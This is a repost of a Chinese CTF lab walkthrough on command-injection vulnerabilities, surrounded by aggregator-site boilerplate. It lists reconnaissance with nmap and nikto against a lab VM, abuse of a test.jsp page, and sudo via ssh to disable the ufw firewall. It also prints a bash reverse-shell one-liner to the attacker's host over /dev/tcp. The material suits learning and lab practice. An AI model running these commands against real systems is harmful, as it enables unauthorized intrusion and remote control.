我的编程空间，编程开发者的网络收藏夹

学习永远不晚

位置：首页-资讯-后端开发

CTF-命令执行【超详细】

2023-08-31 16:12

短信预约 -IT技能 免费直播动态提醒

前言

作者简介：不知名白帽，网络安全学习者。

博客主页：https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏：https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

目录

命令执行漏洞介绍

nmap -sV 192.168.20.136

访问192.168.20.136:8080

敏感信息探测

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

利用ssh协议执行root权限的命令

关闭Ubuntu中的防火墙

靶机反弹shell

命令执行漏洞介绍

当应用需要调用一些外部应用程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等，当用户可以控制命令执行函数中的参数时，将可以注入恶意命令到正常命令中，造成命令执行攻击。

调用这些函数执行系统命令的时候，如果将用户的输入作为系统命令的参数拼接到命令行中，有没有多虑用户输入的情况下，就会造成命令执行漏洞。

实验环境

kali 192.168.20.128

靶机 192.168.20.136

链接：https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码：t1x0

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

发现敏感信息

敏感信息探测

nikto -host http://192.168.20.136:8080

发现/test.jsp并进行访问

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

提权

监听端口

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

查看flag

来源地址：https://blog.csdn.net/m0_63127854/article/details/126694788

免责声明：

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的，并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据，供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

php 安全网络

阅读原文内容投诉

CTF-命令执行【超详细】

下载Word文档到电脑，方便收藏和打印～

下载Word文档

相关文章

猜你喜欢

CTF-命令执行【超详细】

2023-08-31

命令执行漏洞超详细讲解

2023-08-31

CTF命令执行的常见姿势

2023-09-20

CTF命令执行及绕过技巧

2024-04-02

python 远程执行命令的详细代码

2024-04-02

Linux命令大全(超详细版)

2023-09-09

CTFShow-WEB入门篇命令执行详细Wp(29-40)

2023-09-04

Android执行shell命令详解

一、方法代码如下:/** * 执行一个shell命令，并返回字符串值 * * @param cmd * 命令名称&参数组成的数组（例如：{"/system/bin/cat", "/proc/version"}） * @param work

2022-06-06

计算机常用命令(超详细)

计算机常用命令有很多，下面是一些常用的命令以及它们的功能和用法：1. dir：列出当前目录下的文件和子目录。用法：dir [路径] [选项]示例：dir /w 显示宽格式列表2. cd：改变当前目录。用法：cd [目录路径]示例：cd C:

2023-09-14

Linux 系统 grep 命令超详细讲解

grep命令是Linux系统中非常常用的搜索命令，用于在文件中查找指定的字符串。下面是grep命令的详细讲解：基本语法：grep [选项] 字符串文件名选项：- i 忽略大小写- r 递归搜索- v 反选，只打印没有匹配到字符串的行- l

2023-09-15

Java.Utils怎么执行命令行命令

小编给大家分享一下Java.Utils怎么执行命令行命令，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！常用的java框架有哪些1.SpringMVC，Spring

2023-06-14

Python：执行命令行指令

2023-09-30

ctfshow 命令执行

2023-08-31

Linux命令行循环执行shell命令

目录linux命令行，循环执行shell命令死循环命令格式效果普通计数循环循环10次效果L编程inux shell循环命令 while死循环的用法Linux命令行，循环执行shell命令死循环命令格式 while true编程 ;do

2023-01-03

java如何执行（命令执行）

执行java文件方法：（相关视频教程推荐：java视频教程）使用环境:jdk1.6文件目录：javac *.java会生成对应的*.class文件java *.class就可以执行了，.class可以省略1、t.java中是没有包的public class t

java如何执行（命令执行）

2019-10-16

详解Shell命令的执行顺序

详解Shell命令的执行顺序？很多新手对此不是很清楚，为了帮助大家解决这个难题，下面小编将为大家详细讲解，有这方面需求的人可以来学习下，希望你能有所收获。Shell 从标准输入或脚本中读取的每一行称为管道（pipeline）;它包含了一个或

2023-06-09

RCE代码及命令执行(详解)

2023-09-11

python paramiko 执行命令

参考http://wangwei007.blog.51cto.com/blog/68019/1058726http://youzao.blog.51cto.com/3946111/1348903在node1上想对node2执行命令，标准的答

2023-01-31

Java执行shell命令

2023-09-05

python执行cmd命令

最典型的模块一，执行cmd并读取返回值 import subprocessp = subprocess.Popen("ls", stdout=subprocess.PIPE, universal_newlines=True)

2023-01-31

编程热搜

Python 学习之路 - Python
一、安装Python34Windows在Python官网（https://www.python.org/downloads/）下载安装包并安装。Python的默认安装路径是：C:\Python34配置环境变量：【右键计算机】--》【属性】-
chatgpt的中文全称是什么
chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型，它能够通过学习和理解人类的语言来进行对话，还能根据聊天的上下文进行互动，并协助人类完成一系列
C/C++中extern函数使用详解
C/C++可变参数的使用
可变参数的使用方法远远不止以下几种，不过在C,C++中使用可变参数时要小心，在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少，否则会产生访问越界，运气不好的话还会导致程序崩溃
css样式文件该放在哪里
php中数组下标必须是连续的吗
Python 3 教程
Python 3 教程 Python 的 3.0 版本，常被称为 Python 3000，或简称 Py3k。相对于 Python 的早期版本，这是一个较大的升级。为了不带入过多的累赘，Python 3.0 在设计的时候没有考虑向下兼容。 Python
Python pip包管理
一、前言在Python中，安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具： easy_install 和 pip ，目前官方推荐使用 pip。
ubuntu如何重新编译内核
改善Java代码之慎用java动态编译

编程资源站

资料下载
历年试题

信息系统项目管理师选择题每日一练（2024）历年试题

2023年下半年信息系统项目管理师综合知识真题演练历年试题

目录

反馈

我要
反馈